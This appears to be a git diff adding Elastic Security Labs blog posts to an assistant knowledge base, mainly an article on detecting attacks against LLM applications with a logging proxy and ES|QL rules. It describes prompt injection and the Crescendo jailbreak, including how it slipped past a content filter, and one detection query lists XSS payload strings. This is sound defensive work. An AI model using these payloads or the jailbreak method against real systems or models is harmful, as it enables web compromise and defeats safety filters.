+Initially, endpoint security relied on simple antivirus, which was only as good as its antivirus signatures. To avoid increasingly sophisticated malware and threats, endpoint security evolved by employing more advanced technologies like next-gen antivirus with machine learning and artificial intelligence. CSPM is currently facing a similar situation. Right now, we are closer to the bottom of the cloud security learning curve than the top, and our technologies and strategies must continue to evolve to manage new and emerging threats.
+
+The Elastic Global Threat Report demonstrates that native tools and traditional security tactics are ineffective when implemented in cloud environments and offers recommendations for how organizations can adapt to the evolving threat landscape.
+
+## Get the basics right first
+
+Security leaders and teams should leverage insights from this report to inform their priorities and adjust their workflows accordingly.
+
+The findings clearly show why focusing on and improving basic security hygiene is so crucial to improved security outcomes. Too often, an organization’s environment is compromised by something as simple as a weak password or failure to update default configurations. Prioritizing security fundamentals — identity and access management, patching, threat modeling, password awareness, and multi-factor authentication — is a simple yet effective way for security teams to prevent and protect against potential threats.
+
+## Develop security in the open
+
+Organizations should consider adopting an open approach to security. For example, Elastic’s threat report links to our recent publication of [protection artifacts](https://github.com/elastic/protections-artifacts), which transparently shares endpoint behavioral logic that we develop at Elastic to identify adversary tradecraft and make it freely available to our community.
+
+The report also highlights how Elastic Security’s [prebuilt detection rules](https://github.com/elastic/detection-rules/tree/main/rules) map to the MITRE ATT&CK matrix for each cloud service provider. As an adopter of the MITRE framework since its inception, Elastic understands the importance of mapping detection rules to an industry standard. For my team, this helps us have deeper insights into the breadth and depth of our security posture.
+
+Providing open detection rules, open artifacts, and open code enables organizations to focus on addressing gaps in their security technology stack and developing risk profiles for new and emerging threats. Without openness and transparency in security, organizations are putting themselves at greater risk of tomorrow’s cybersecurity threats.
+
+Download the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/embedding_security_in_llm_workflows.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/embedding_security_in_llm_workflows.md
new file mode 100644
index 0000000000000..f211ccf4f21ae
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/embedding_security_in_llm_workflows.md
@@ -0,0 +1,498 @@
+---
+title: "Embedding Security in LLM Workflows: Elastic's Proactive Approach"
+slug: "embedding-security-in-llm-workflows"
+date: "2024-04-25"
+subtitle: "Exploring Elastic's innovative approach for integrating security into the lifecycle of LLMs to safeguard against vulnerabilities featuring Elastic’s AI Assistant."
+description: "Dive into Elastic's exploration of embedding security directly within Large Language Models (LLMs). Discover our strategies for detecting and mitigating several of the top OWASP vulnerabilities in LLM applications, ensuring safer and more secure AI-driven applications."
+author:
+  - slug: mika-ayenson
+image: "Security Labs Images 5.jpg"
+category:
+  - slug: detection-science
+  - slug: machine-learning
+  - slug: generative-ai
+---
+
+We recently concluded one of our quarterly Elastic OnWeek events, which provides a unique week to explore opportunities outside of our regular day-to-day. In line with recent publications from [OWASP](https://owasp.org/www-project-top-10-for-large-language-model-applications/) and the [NSA AISC](https://media.defense.gov/2024/Apr/15/2003439257/-1/-1/0/CSI-DEPLOYING-AI-SYSTEMS-SECURELY.PDF), we decided to spend some time with the OWASP Top Ten vulnerabilities for LLMs natively in Elastic. In this article, we touch on a few opportunities to detect malicious LLM activity with [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html), namely:
+
+ - LLM01: Prompt Injection
+ - LLM02: Insecure Output Handling
+ - LLM04: Model Denial of Service
+ - LLM06: Sensitive Information Disclosure
+
+Elastic provides the ability to audit LLM applications for malicious behaviors; we’ll show you one approach with just four steps:
+
+ 1. Intercepting and analyzing the LLM requests and responses 
+ 2. Enriching data with LLM-specific analysis results
+ 3. Sending data to Elastic Security
+ 4. Writing ES|QL detection rules that can later be used to respond 
+
+This approach reflects our ongoing efforts to explore and implement advanced detection strategies, including developing detection rules tailored specifically for LLMs, while keeping pace with emerging generative AI technologies and security challenges. Building on this foundation, last year marked a significant enhancement to our toolkit and overall capability to continue this proactive path forward. 
+
+Elastic [released](https://www.elastic.co/blog/introducing-elastic-ai-assistant) the AI Assistant for Security, introducing how the open generative AI sidekick is powered by the [Search AI Platform](https://www.elastic.co/platform) — a collection of relevant tools for developing advanced search applications. Backed by machine learning (ML) and artificial intelligence (AI), this AI Assistant provides powerful pre-built workflows like alert summarization, workflow suggestions, query conversions, and agent integration advice. I highly recommend you read more on Elastic’s [AI Assistant](https://www.elastic.co/elasticsearch/ai-assistant) about how the capabilities seamlessly span across Observability and Security.
+
+We can use the  AI Assistant’s capabilities as a third-party LLM application to capture, audit, and analyze requests and responses for convenience and to run experiments. Once data is in an index, writing behavioral detections on it becomes business as usual —  we can also leverage the entire security detection engine. Even though we’re proxying the Elastic AI Assistant LLM activity in this experiment, it’s merely used as a vehicle to demonstrate auditing LLM-based applications. Furthermore, this proxy approach is intended for third-party applications to ship data to [Elastic Security](https://www.elastic.co/guide/en/security/current/es-overview.html). 
+
+We can introduce security mechanisms into the application's lifecycle by intercepting LLM activity or leveraging observable LLM metrics. It’s common practice to address prompt-based threats by [implementing various safety tactics](https://platform.openai.com/docs/guides/safety-best-practices):
+
+ 1. **Clean Inputs**: Sanitize and validate user inputs before feeding them to the model
+ 2. **Content Moderation**: Use OpenAI tools to filter harmful prompts and outputs
+ 3. **Rate Limits and Monitoring**: Track usage patterns to detect suspicious activity
+ 4. **Allow/Blocklists**: Define acceptable or forbidden inputs for specific applications
+ 5. **Safe Prompt Engineering**: Design prebuilt prompts that guide the model towards intended outcomes
+ 6. **User Role Management**: Control user access to prevent unauthorized actions
+ 7. **Educate End-Users**: Promote responsible use of the model to mitigate risks
+ 8. **Red Teaming & Monitoring**: Test for vulnerabilities and continuously monitor for unexpected outputs
+ 9. **HITL Feedback for Model Training**: Learn from human-in-the-loop, flagged issues to refine the model over time
+ 10. **Restrict API Access**: Limit model access based on specific needs and user verification
+
+Two powerful features provided by OpenAI, and many other LLM implementers, is the ability to [submit end-user IDs](https://platform.openai.com/docs/guides/safety-best-practices/end-user-ids) and check content against a [moderation API](https://platform.openai.com/docs/guides/moderation), features that set the bar for LLM safety. Sending hashed IDs along with the original request aids in abuse detection and provides targeted feedback, allowing unique user identification without sending personal information. Alternatively, OpenAI's moderation endpoint helps developers identify potentially harmful content like hate speech, self-harm encouragement, or violence, allowing them to filter such content. It even goes a step further by detecting threats and intent to self-harm. 
+
+Despite all of the recommendations and best practices to protect against malicious prompts, we recognize that there is no single perfect solution. When using capabilities like OpenAI’s API, some of these threats may be detected by the content filter, which will respond with a usage policy violation notification:   
+
+![Violation notification from OpenAI](/assets/images/embedding-security-in-llm-workflows/image5.png)
+
+
+This content filtering is beneficial to address many issues; however, it cannot identify further threats in the broader context of the environment, application ecosystem, or other alerts that may appear. The more we can integrate generative AI use cases into our existing protection capabilities, the more control and possibilities we have to address potential threats. Furthermore, even if LLM safeguards are in place to stop rudimentary attacks, we can still use the detection engine to alert and take future remediation actions instead of silently blocking or permitting abuse. 
+
+## Proxying LLM Requests and Setup
+
+The optimal security solution integrates additional safeguards directly within the LLM application's ecosystem. This allows enriching alerts with the complete context surrounding requests and responses. As requests are sent to the LLM, we can intercept and analyze them for potential malicious activity. If necessary, a response action can be triggered to defer subsequent HTTP calls. Similarly, inspecting the LLM's response can uncover further signs of malicious behavior. 
+
+Using a proxy to handle these interactions offers several advantages:
+
+ - **Ease of Integration and Management**: By managing the new security code within a dedicated proxy application, you avoid embedding complex security logic directly into the main application. This approach minimizes changes needed in the existing application structure, allowing for easier maintenance and clearer separation of security from business logic. The main application must only be reconfigured to route its LLM requests through the proxy.
+ - **Performance and Scalability**: Placing the proxy on a separate server isolates the security mechanisms and helps distribute the computational load. This can be crucial when scaling up operations or managing performance-intensive tasks, ensuring that the main application's performance remains unaffected by the additional security processing.
+
+### Quick Start Option: Proxy with Flask
+
+You can proxy incoming and outgoing LLM connections for a faster initial setup. This approach can be generalized for other LLM applications by creating a simple Python-based [Flask](https://flask.palletsprojects.com/en/3.0.x/) application. This application would intercept the communication, analyze it for security risks, and log relevant information before forwarding the response.
+
+![Approach to Intercept Elastic Request/Responses](/assets/images/embedding-security-in-llm-workflows/image3.png)
+
+
+Multiple SDKs exist to connect to Elasticsearch and handle OpenAI LLM requests. The provided [llm-detection-proxy](https://github.com/elastic/llm-detection-proxy) repo demonstrates the available Elastic and OpenAI clients. This snippet highlights the bulk of the experimental proxy in a single Flask route.
+
+``` python
+@app.route("/proxy/openai", methods=["POST"])
+def azure_openai_proxy():
+   """Proxy endpoint for Azure OpenAI requests."""
+   data = request.get_json()
+   messages = data.get("messages", [])
+   response_content = ""
+   error_response = None
+
+   try:
+       # Forward the request to Azure OpenAI
+       response = client.chat.completions.create(model=deployment_name, messages=messages)
+       response_content = response.choices[0].message.content  # Assuming one choice for simplicity
+       choices = response.choices[0].model_dump()
+   except openai.BadRequestError as e:
+       # If BadRequestError is raised, capture the error details
+       error_response = e.response.json().get("error", {}).get("innererror", {})
+       response_content = e.response.json().get("error", {}).get("message")
+
+       # Structure the response with the error details
+       choices = {**error_response.get("content_filter_result", {}),
+                  "error": response_content, "message": {"content": response_content}}
+
+   # Perform additional analysis and create the Elastic document
+   additional_analysis = analyze_and_enrich_request(prompt=messages[-1],
+                                                    response_text=response_content,
+                                                    error_response=error_response)
+   log_data = {"request": {"messages": messages[-1]},
+               "response": {"choices": response_content},
+               **additional_analysis}
+
+   # Log the last message and response
+   log_to_elasticsearch(log_data)
+
+   # Calculate token usage
+   prompt_tokens = sum(len(message["content"]) for message in messages)
+   completion_tokens = len(response_content)
+   total_tokens = prompt_tokens + completion_tokens
+
+   # Structure and return the response
+   return jsonify({
+       "choices": [choices],
+       "usage": {
+           "prompt_tokens": prompt_tokens,
+           "completion_tokens": completion_tokens,
+           "total_tokens": total_tokens,
+       }
+   })
+```
+
+With the Flask server, you can configure the [OpenAI Kibana Connector](https://www.elastic.co/guide/en/kibana/current/openai-action-type.html) to use your proxy. 
+
+![](/assets/images/embedding-security-in-llm-workflows/image10.png)
+
+Since this proxy to your LLM is running locally, credentials and connection information are managed outside of Elastic, and an empty string can be provided in the API key section. Before moving forward, testing your connection is generally a good idea. It is important to consider other security implications if you are considering implementing a proxy solution in a real environment - not something this prototype considered for brevity.
+
+![Sample screenshot of the AI Assistant operating through the prototype proxy](/assets/images/embedding-security-in-llm-workflows/image4.png)
+
+
+We can now index our LLM requests and responses and begin to write detections on the available data in the ```azure-openai-logs``` index created in this experiment. Optionally, we could preprocess the data using an Elastic [ingestion pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html), but in this contrived example, we can effectively write detections with the power of ES|QL.
+
+![Sample AzureOpenAI LLM Request/Response Data
+Langsmith Proxy](/assets/images/embedding-security-in-llm-workflows/image13.png)
+Sample AzureOpenAI LLM Request/Response Data
+
+### Langsmith Proxy
+
+*Note: The [Langsmith Proxy](https://docs.smith.langchain.com/proxy/quickstart) project provides a dockerized proxy for your LLM APIs. While it offers a minimized solution, as of this writing, it lacks native capabilities for incorporating custom security analysis tools or integrating directly with Elastic Security.*
+
+The LangSmith Proxy is designed to simplify LLM API interaction. It's a sidecar application requiring minimal configuration (e.g., LLM API URL). It enhances performance (caching, streaming) for high-traffic scenarios. It uses NGINX for efficiency and supports optional tracing for detailed LLM interaction tracking. Currently, it works with OpenAI and AzureOpenAI, with future support planned for other LLMs.
+
+## LLM Potential Attacks and Detection Rule Opportunities
+
+**It’s important to understand that even though documented lists of protections do not accompany some LLMs, simply trying some of these prompts may be immediately denied or result in banning on whatever platform used to submit the prompt. We recommend experimenting with caution and understand the SLA prior to sending any malicious prompts. Since this exploration leverages OpenAI’s resources, we recommend following the bugcrowd [guidance](https://bugcrowd.com/openai) and sign up for an additional testing account using your @bugcrowdninja.com email address.**
+
+Here is a list of several plausible examples to illustrate detection opportunities. Each LLM topic includes the OWASP description, an example prompt, a sample document, the detection opportunity, and potential actions users could take if integrating additional security mechanisms in their workflow. 
+
+While this list is currently not extensive, Elastic Security Labs is currently undertaking a number of initiatives to ensure future development, and formalization of rules will continue.
+
+### LLM01 - prompt injection
+
+**OWASP Description**: Manipulating LLMs via crafted inputs can lead to unauthorized access, data breaches, and compromised decision-making. Reference [here](https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/blob/main/2_0_vulns/LLM01_PromptInjection.md).
+
+**Example**: An adversary might try to craft prompts that trick the LLM into executing unintended actions or revealing sensitive information. *Note: Tools like [promptmap](https://github.com/utkusen/promptmap) are available to generate creative prompt injection ideas and automate the testing process.*
+
+**Prompt**:
+![](/assets/images/embedding-security-in-llm-workflows/image7.png)
+
+**Sample Response**:
+![](/assets/images/embedding-security-in-llm-workflows/image8.png)
+
+**Detection Rule Opportunity**: In this example, the LLM responded by refusing to handle database connection strings due to security risks. It emphasizes keeping credentials private and suggests using secure methods like environment variables or vaults to protect them.
+
+A very brittle but basic indicator-matching query may look like this:
+
+``` sql
+FROM azure-openai-logs |
+   WHERE request.messages.content LIKE "*generate*connection*string*"
+   OR request.messages.content LIKE "*credentials*password*username*"
+   OR response.choices LIKE "*I'm sorry, but I can't assist*"
+```
+
+A slightly more advanced query detects more than two similar attempts within the last day. 
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() -  1 DAY
+| WHERE request.messages.content LIKE "*credentials*password*username*"
+   OR response.choices LIKE "*I'm*sorry,*but*I*can't*assist*"
+   OR response.choices LIKE "*I*can’t*process*actual*sensitive*"
+| stats total_attempts = count(*) by connectorId
+| WHERE total_attempts >= 2
+```
+
+*Note that there are many approaches to detect malicious prompts and protect LLM responses. Relying on these indicators alone is not the best approach; however, we can gradually improve the detection with additional enrichment or numerous response attempts. Furthermore, if we introduce an ID into our documents, we can further enhance our query by aggregating attempts based on the field that correlates to a specific user.*
+
+**Example 2**: The [Crescendo](https://arxiv.org/abs/2404.01833v1) effect is a realistic jailbreak attack where an adversary gradually manipulates a language model through a series of seemingly innocent inquiries that shift towards asking the model to describe hypothetical scenarios involving the unauthorized access and manipulation of secure systems. By doing so, they aim to extract methods that could potentially bypass the LLM’s security constraints.
+
+**Prompt**:
+![](/assets/images/embedding-security-in-llm-workflows/image15.png)
+
+**Sample Response**:
+![](/assets/images/embedding-security-in-llm-workflows/image17.png)
+
+With the additional analysis from OpenAI’s filtering, we can immediately detect the first occurrence of abuse. 
+
+**Detection Rule Opportunity**:
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() - 1 DAY
+ AND (
+     request.messages.content LIKE "*credentials*password*username*"
+     OR response.choices LIKE "*I'm sorry, but I can't assist*"
+     OR analysis.openai.code == "ResponsibleAIPolicyViolation"
+     OR malicious
+ )
+| STATS total_attempts = COUNT(*) BY connectorId
+| WHERE total_attempts > 1
+| SORT total_attempts DESC
+```
+
+However, as you continue to use the Crescendo Effect, we notice that the conversation pivot goes unblocked after the initial content filter by OpenAI. It’s important to understand that even if tactics like this are difficult to prevent, we still have opportunities to detect.
+
+![](/assets/images/embedding-security-in-llm-workflows/image6.png)
+
+Additional analysis tools, like LLM-Guard, detect if the conversation is sensitive, which, in this case, is inaccurate. However, it hints at potential opportunities to track malicious behavior over multiple prompts. Note: We could also take advantage of EQL sequences as an alternative to this ES|QL query to help track behaviors over multiple events.
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() - 1 DAY
+ AND (
+     request.messages.content LIKE "*Molotov*"
+     OR analysis.openai.code == "ResponsibleAIPolicyViolation"
+     OR malicious
+ )
+| STATS attempts = count(*), max_sensitivity = max(analysis.llm_guard_response_scores.Sensitive) BY connectorId
+| WHERE attempts >= 1 AND max_sensitivity > 0.5
+| SORT attempts DESC
+```
+
+This query detects suspicious behavior related to Molotov Cocktails across multiple events by analyzing sequences of log entries associated with a single user/session (identified by connectorId). The query core filters events based on:
+
+ - **Content Matching**: It searches for mentions of "Molotov" in conversation content (```request.messages.content LIKE "*Molotov*"```)
+ - **Policy Violations: It identifies attempts blocked by OpenAI's safety filters (```analysis.openai.code == "ResponsibleAIPolicyViolation"```), indicating the start of potentially suspicious behavior
+ - **Malicious Flag Consideration**: It includes logs where the system flagged the content as malicious (```malicious == true```), capturing potentially subtle or varied mentions
+ - **Session-Level Analysis**: By grouping events by connectorId, it analyzes the complete sequence of attempts within a session. It then calculates the total number of attempts (```attempts = count(*)```) and the highest sensitivity score (```max_sensitivity = max(analysis.llm_guard_response_scores.Sensitive)```) across all attempts in that session
+ - **Flagging High-Risk Sessions**: It filters sessions with at least one attempt (```attempts >= 1```) and a maximum sensitivity score exceeding 0.5 (```max_sensitivity > 0.5```). This threshold helps focus on sessions where users persistently discussed or revealed potentially risky content.
+
+By analyzing these factors across multiple events within a session, we can start building an approach to detect a pattern of escalating discussions, even if individual events might not be flagged alone. 
+
+### LLM02 - insecure output handling
+
+**OWASP Description**: Neglecting to validate LLM outputs may lead to downstream security exploits, including code execution that compromises systems and exposes data. Reference [here](https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/blob/main/2_0_vulns/LLM02_InsecureOutputHandling.md).
+
+**Example**: An adversary may attempt to exploit the LLM to generate outputs that can be used for cross-site scripting (XSS) or other injection attacks.
+
+**Prompt**:
+![](/assets/images/embedding-security-in-llm-workflows/image9.png)
+
+**Sample Response**:
+![](/assets/images/embedding-security-in-llm-workflows/image12.png)
+
+**Detection Rule Opportunity**:
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() - 1 DAY
+| WHERE (
+   response.choices LIKE "*<script>*"
+   OR response.choices LIKE "*document.cookie*"
+   OR response.choices LIKE "*<img src=x onerror=*"
+   OR response.choices LIKE "*<svg/onload=*"
+   OR response.choices LIKE "*javascript:alert*"
+   OR response.choices LIKE "*<iframe src=# onmouseover=*"
+   OR response.choices LIKE "*<img ''><script>*"
+   OR response.choices LIKE "*<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>*"
+   OR response.choices LIKE "*<IMG SRC=# onmouseover=alert('xxs')>*"
+   OR response.choices LIKE "*<IMG onmouseover=alert('xxs')>*"
+   OR response.choices LIKE "*<IMG SRC=/ onerror=alert(String.fromCharCode(88,83,83))>*"
+   OR response.choices LIKE "*&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>*"
+   OR response.choices LIKE "*<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>*"
+   OR response.choices LIKE "*<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">*"
+)
+| stats total_attempts = COUNT(*), users = COUNT_DISTINCT(connectorId)
+| WHERE total_attempts >= 2
+```
+
+This pseudo query detects potential insecure output handling by identifying LLM responses containing scripting elements or cookie access attempts, which are common in Cross-Site Scripting (XSS) attacks. It is a shell that could be extended by allow or block lists for well-known keywords. 
+
+### LLM04 - model DoS
+
+**OWASP Description**: Overloading LLMs with resource-heavy operations can cause service disruptions and increased costs. Reference [here](https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/blob/main/2_0_vulns/LLM04_ModelDoS.md).
+
+**Example**: An adversary may send complex prompts that consume excessive computational resources. 
+
+**Prompt**:
+![](/assets/images/embedding-security-in-llm-workflows/image2.png)
+
+**Sample Response**:
+![](/assets/images/embedding-security-in-llm-workflows/image18.png)
+
+Detection Rule Opportunity:
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() -  1 DAY
+| WHERE response.choices LIKE "*requires*significant*computational*resources*"
+| stats total_attempts = COUNT(*), users = COUNT_DISTINCT(connectorId)
+| WHERE total_attempts >= 2
+```
+
+This detection illustrates another simple example of how the LLM response is used to identify potentially abusive behavior. Although this example may not represent a traditional security threat, it could emulate how adversaries can impose costs on victims, either consuming resources or tokens. 
+
+**Example 2**: An adversary may send complex prompts that consume excessive computational resources. 
+
+**Prompt**:
+![](/assets/images/embedding-security-in-llm-workflows/image16.png)
+
+**Sample Response**:
+![](/assets/images/embedding-security-in-llm-workflows/image14.png)
+
+At a glance, this prompt appears to be benign. However, excessive requests and verbose responses in a short time can significantly increase costs. 
+
+**Detection Rule Opportunity**:
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() - 1 HOUR
+| STATS request_count = COUNT(*), distinct_prompts = COUNT_DISTINCT(request.messages.content) BY connectorId
+| WHERE request_count > 50 AND distinct_prompts > 10
+| SORT request_count DESC
+```
+
+In the context of example 2, this working query efficiently tracks and analyzes usage patterns by counting all requests and distinct prompt contents for each ```connectorId``` from the ```azure-openai-logs``` over the past hour. If any ```connectorId``` submits over 50 requests with more than ten unique prompts within this timeframe, it indicates a potential misuse pattern like the one described, where an adversary might be modifying queries to probe encryption algorithm details, potentially causing undue load or evading detection systems. The results are then ordered to prioritize the ```connectorIds``` with the highest request counts, which helps quickly identify the most active or suspicious sources.
+
+### LLM06 - sensitive information disclosure
+
+**OWASP Description**: Failure to protect against disclosure of sensitive information in LLM outputs can result in legal consequences or a loss of competitive advantage. Reference [here](https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/blob/main/2_0_vulns/LLM06_SensitiveInformationDisclosure.md).
+
+**Example**: An adversary may craft prompts to extract sensitive information embedded in the training data. 
+
+**Prompt**:
+![](/assets/images/embedding-security-in-llm-workflows/image1.png)
+
+**Sample Response**:
+![](/assets/images/embedding-security-in-llm-workflows/image19.png)
+
+Detection Rule Opportunity:
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() - 1 DAY
+| WHERE request.messages.content LIKE "*common*passwords*used*in*the*dataset*" AND malicious
+| stats total_attempts = COUNT(*), users = COUNT_DISTINCT(connectorId)
+ BY identified_threats.keyword, analysis.langkit_score
+| WHERE total_attempts >= 2
+```
+
+This query searches for logs from the last day that contain requests specifically asking about "common passwords used in the dataset" to train the model and where such requests are flagged as malicious. It aggregates these logs to count the number of such attempts and identifies distinct users involved, grouped by any identified threats and the language kit score. With some enrichment, the inclusion of ```AND malicious = true``` ensures focus on requests already flagged as potentially harmful, helping to prioritize investigation and response actions.
+
+## Enriching Detection Rules with Security Insights
+
+By routing LLM requests through a proxy, we can capitalize on specialized security tools to analyze each request for signs of malicious intent. Upon detection, the original request can be enriched with additional metadata indicating the likelihood of malicious content and the specific type of threat it represents. This enriched data is then indexed in Elasticsearch, creating a robust monitoring, alerting, and retrospective analysis dataset. With this enrichment, the LLM detection opportunities from the last section are possible.
+
+We don’t deep-dive on every tool available, but several open-source tools have emerged to offer varying approaches to analyzing and securing LLM interactions. Some of these tools are backed by machine learning models trained to detect malicious prompts:
+
+ - **Rebuff** ([GitHub](https://github.com/protectai/rebuff)): Utilizes machine learning to identify and mitigate attempts at social engineering, phishing, and other malicious activities through LLM interactions. Example usage involves passing request content through Rebuff's analysis engine and tagging requests with a "malicious" boolean field based on the findings. 
+ - **LLM-Guard** ([GitHub](https://github.com/protectai/llm-guard)): Provides a rule-based engine for detecting harmful patterns in LLM requests. LLM-Guard can categorize detected threats based on predefined categories, enriching requests with detailed threat classifications. 
+ - **LangKit** ([GitHub](https://github.com/whylabs/langkit/tree/main)): A toolkit designed for monitoring and securing LLMs, LangKit can analyze request content for signs of adversarial inputs or unintended model behaviors. It offers hooks for integrating custom analysis functions.
+ - **Vigil-LLM** ([GitHub](https://github.com/deadbits/vigil-llm)): Focuses on real-time monitoring and alerting for suspicious LLM requests. Integration into the proxy layer allows for immediate flagging potential security issues, enriching the request data with vigilance scores.
+ - **Open-Prompt Injection** ([GitHub](https://github.com/liu00222/Open-Prompt-Injection)): Offers methodologies and tools for detecting prompt injection attacks, allowing for the enrichment of request data with specific indicators of compromise related to prompt injection techniques.
+
+*Note: Most of these tools require additional calls/costs to an external LLM, and would require further infrastructure to threat hunt effectively.*
+
+One simple example implementation that uses LLM-guard and LangKit might look like this:
+
+``` python
+def analyze_and_enrich_request(
+   prompt: str, response_text: str, error_response: Optional[dict] = None
+) -> dict:
+   """Analyze the prompt and response text for malicious content and enrich the document."""
+
+   # LLM Guard analysis
+   sanitized_prompt, results_valid_prompt, results_score_prompt = scan_prompt(
+       input_scanners, prompt["content"]
+   )
+   (
+       sanitized_response_text,
+       results_valid_response,
+       results_score_response,
+   ) = scan_output(output_scanners, sanitized_prompt, response_text)
+
+   # LangKit for additional analysis
+   schema = injections.init()
+   langkit_result = extract({"prompt": prompt["content"]}, schema=schema)
+
+   # Initialize identified threats and malicious flag
+   identified_threats = []
+
+   # Check LLM Guard results for prompt
+   if not any(results_valid_prompt.values()):
+       identified_threats.append("LLM Guard Prompt Invalid")
+
+   # Check LLM Guard results for response
+   if not any(results_valid_response.values()):
+       identified_threats.append("LLM Guard Response Invalid")
+
+   # Check LangKit result for prompt injection
+   prompt_injection_score = langkit_result.get("prompt.injection", 0)
+   if prompt_injection_score > 0.4:  # Adjust threshold as needed
+       identified_threats.append("LangKit Injection")
+
+   # Identify threats based on LLM Guard scores
+   for category, score in results_score_response.items():
+       if score > 0.5:
+           identified_threats.append(category)
+
+   # Combine results and enrich document
+   # llm_guard scores map scanner names to float values of risk scores,
+   # where 0 is no risk, and 1 is high risk.
+   # langkit_score is a float value of the risk score for prompt injection
+   # based on known threats.
+   enriched_document = {
+       "analysis": {
+           "llm_guard_prompt_scores": results_score_prompt,
+           "llm_guard_response_scores": results_score_response,
+           "langkit_score": prompt_injection_score,
+       },
+       "malicious": any(identified_threats),
+       "identified_threats": identified_threats,
+   }
+
+   # Check if there was an error from OpenAI and enrich the analysis
+   if error_response:
+       code = error_response.get("code")
+       filtered_categories = {
+           category: info["filtered"]
+           for category, info in error_response.get(
+               "content_filter_result", {}
+           ).items()
+       }
+
+       enriched_document["analysis"]["openai"] = {
+           "code": code,
+           "filtered_categories": filtered_categories,
+       }
+       if code == "ResponsibleAIPolicyViolation":
+           enriched_document["malicious"] = True
+
+   return enriched_document
+```
+
+This function could be called for each request passing through the proxy, with the returned data being appended to the request document before it's sent to Elasticsearch. The result is a detailed and actionable dataset that captures the raw interactions with the LLM and provides immediate security insights to embed in our detection rules based on the request and response. Going full circle with the prompt injection LLM01 example, the query could be updated to something like this:
+
+``` sql
+FROM azure-openai-logs
+| WHERE @timestamp > NOW() - 1 DAY
+| WHERE identified_threats.keyword == "LangKit Injection" OR analysis.langkit_score > 0.4
+| stats total_attempts = count(*), users = count_distinct(connectorId) by identified_threats.keyword, analysis.langkit_score
+| WHERE users == 1 and total_attempts >= 2
+```
+
+As you can see, both scoring mechanisms are subjective based on the results returned from the open source prompt analysis tools. This query filters logs from the past day where the identified threat is "LangKit Injection" or the LangKit score is above ```0.4```. It then calculates the total attempts and counts the number of unique users (agents) associated with each identified threat category and LangKit score, filtering to include only cases where there's a single user involved (```users == 1```) and the total attempts are two or more (```total_attempts >= 2```).
+
+With these additional tools, we have a variety of analysis result fields available to improve our detection rules. In these examples, we shipped most of the data as-is for simplicity. However, in a production environment, it's crucial to normalize these fields across all tools and LLM responses to a schema like [Elastic Common Schema](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) (ECS). Normalizing data to ECS enhances interoperability between different data sources, simplifies analysis, and streamlines the creation of more effective and cohesive security rules.
+
+In Part two of this series, we will discuss how we’ve taken a more formal approach to ECS field mapping, and integrations.
+
+## Alternative Options for LLM Application Auditing
+
+While using a proxy may be straightforward, other approaches may better suit a production setup; for example: 
+
+ - Utilizing [application performance monitoring](https://www.elastic.co/observability/application-performance-monitoring) (APM) 
+ - Using the OpenTelemetry integration
+ - Modifying changes in Kibana directly to audit and trace LLM activity
+
+Unsurprisingly, these approaches have potential limitations like not natively ingesting all the LLM security analysis tool data generated without developing custom logic to support third-party tools.
+
+### Leveraging Elastic APM for In-Depth Application Insights
+
+Elastic [APM](https://www.elastic.co/guide/en/observability/current/apm.html) provides an alternative solution for monitoring applications in real-time, essential for detecting performance bottlenecks and identifying problematic requests or queries. By integrating Elastic APM, users gain detailed insights into transaction times, database query performance, external API call efficiency, and more. This comprehensive visibility makes it easier to address and resolve performance issues or errors quickly. Unlike the proxy approach, APM automatically ingests logs into Elastic about your application, providing an opportunity to create security detection rules based on the behaviors seen within your data.
+
+### Utilizing OpenTelemetry for Enhanced Observability
+
+For applications already employing OpenTelemetry, leveraging its [integration](https://www.elastic.co/guide/en/observability/current/apm-open-telemetry.html) with Elastic APM can enhance observability without requiring extensive instrumentation changes. This integration supports capturing a wide array of telemetry data, including traces and metrics, which can be seamlessly sent to the Elastic Stack. This approach allows developers to continue using familiar libraries while benefiting from the robust monitoring capabilities of Elastic. OpenTelemetry’s compatibility across multiple programming languages and its [support through Elastic’s native protocol](https://www.elastic.co/guide/en/observability/current/apm-open-telemetry.html) (OTLP) facilitate straightforward data transmission, providing a robust foundation for monitoring distributed systems. Compared to the proxy example, this approach more natively ingests data than maintaining an independent index and logging mechanism to Elastic. 
+
+### LLM Auditing with Kibana
+
+Like writing custom logic for your LLM application to audit and ship data, you can test the approach with Elastic’s AI Assistant. If you're comfortable with TypeScript, consider deploying a local Elastic instance using the Kibana [Getting Started Guide](https://www.elastic.co/guide/en/kibana/current/development-getting-started.html). Once set up, navigate to the [Elastic AI Assistant](https://github.com/elastic/kibana/tree/main/x-pack/plugins/elastic_assistant) and configure it to intercept LLM requests and responses for auditing and analysis. Note: This approach primarily tracks Elastic-specific LLM integration compared to using APM and other integrations or a proxy to track third-party applications. It should only be considered for experimentation and exploratory testing purposes. 
+
